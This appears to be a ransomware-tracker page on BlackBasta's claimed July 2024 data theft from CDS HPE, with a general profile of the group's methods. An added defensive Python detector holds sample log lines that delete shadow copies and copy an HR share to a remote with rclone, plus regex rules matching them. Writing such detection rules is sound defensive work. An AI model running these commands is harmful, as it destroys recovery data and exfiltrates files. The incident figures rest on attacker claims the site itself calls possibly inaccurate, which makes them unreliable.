In-Depth Analysis of BlackBasta Ransomware Attack on CDS HPE: Data Exfiltration and Impact

Incident Date:

July 15, 2024

Overview

Victim

CDS HPE

Attacker

BlackBasta

Location

Consorzio Tecnocittà, Italy

First Reported

July 15, 2024

Ransomware Attack on CDS HPE by BlackBasta: A Detailed Analysis

Overview of CDS HPE

CDS HPE, a wholly-owned subsidiary of Hewlett Packard Enterprise (HPE), operates primarily in Europe, delivering customized technical services and support across various sectors. Established following HPE's acquisition of Synstar, CDS has built a strong reputation in providing infrastructure technical support, including field maintenance, installations, networking support, system administration, and software development. The company employs over 1,500 individuals across ten European countries and reported an annual revenue of approximately $115 million in 2024.

Attack Details

The ransomware group BlackBasta has claimed responsibility for a recent cyberattack on CDS HPE. The attackers have reportedly exfiltrated 500 GB of sensitive data, including company information, confidential documents, human resources and hiring data, personal employee records, client data, and project details. The group has set a ransom deadline of July 23, 2024, pressuring CDS HPE to comply with its demands to prevent the exposure or misuse of the stolen data.

About BlackBasta

BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group. BlackBasta carries out highly targeted attacks on organizations, employing a double extortion tactic: it encrypts critical data and threatens to publish sensitive information on its public leak site if the ransom is not paid. The group has targeted over 500 organizations worldwide and has collected up to $100 million in ransom payments from more than 90 victims since its emergence.

Penetration Methods

BlackBasta employs several strategies to gain initial access to target networks, including spear-phishing campaigns, insider information, and purchased network access. Once inside a network, the group uses tools such as QakBot and Mimikatz, and exploits vulnerabilities, to move laterally and harvest credentials. To maintain control over compromised systems, BlackBasta uses tools such as Cobalt Strike Beacons, SystemBC, and Rclone. Before encrypting files, the group disables security tools, deletes shadow copies, and exfiltrates sensitive data to maximize its leverage.
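As an added illustration that is not part of the original report, the following Python snippet shows how two of the behaviours described above, shadow-copy deletion and Rclone transfers to a remote, can be flagged in process-creation logs. The sample events and their field names are constructed for this example; the ATT&CK technique IDs are standard annotations, not from the page.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are not real CDS HPE logs; the field names are an assumption for this example.
SAMPLE_EVENTS = [
    {"host": "ws-07", "user": "CORP\\alice", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "fs-01", "user": "CORP\\svc-backup", "image": r"C:\Program Files\Backup\agent.exe",
     "cmdline": "agent.exe --snapshot create"},
    {"host": "fs-01", "user": "CORP\\bob", "image": r"C:\Users\bob\AppData\Local\Temp\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\HR remote:bucket --transfers 32"},
    {"host": "ws-02", "user": "CORP\\carol", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"host": "ws-02", "user": "CORP\\carol", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Each rule: (rule name, regex applied to the lower-cased command line, ATT&CK technique).
# T1490 = Inhibit System Recovery; T1567 = Exfiltration Over Web Service.
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"), "T1490"),
    ("shadow_copy_deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete"), "T1490"),
    # rclone copy/sync/move from a source to a named remote ("remote:bucket"); a single
    # drive letter such as "e:" is excluded so local-to-local copies do not fire.
    ("rclone_exfiltration",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s+\S+\s+[a-z0-9_-]{2,}:"), "T1567"),
]

def match_event(event):
    """Return the list of (rule_name, technique) pairs matched by one event."""
    cmd = event["cmdline"].lower()
    return [(name, tech) for name, rx, tech in RULES if rx.search(cmd)]

def detect(events):
    """Run all rules over a list of events and return alerts in input order."""
    alerts = []
    for ev in events:
        for name, tech in match_event(ev):
            alerts.append({"host": ev["host"], "user": ev["user"], "rule": name,
                           "technique": tech, "cmdline": ev["cmdline"]})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["host"]} {a["user"]} [{a["rule"]}/{a["technique"]}] {a["cmdline"]}')
```

In practice the same rules would be expressed as Sigma or SIEM queries over the real process-creation telemetry, and shadow-copy deletion from a non-backup account is worth an immediate triage rather than a low-priority alert.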

Vulnerabilities and Impact

CDS HPE's extensive operations and large workforce make it a lucrative target for ransomware groups like BlackBasta. The company's reliance on customized technical services and support across various sectors, combined with the sensitive nature of the data it handles, increases its vulnerability to cyberattacks. The exfiltration of 500 GB of sensitive data could have significant repercussions for CDS HPE, including potential financial losses, reputational damage, and operational disruptions.

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.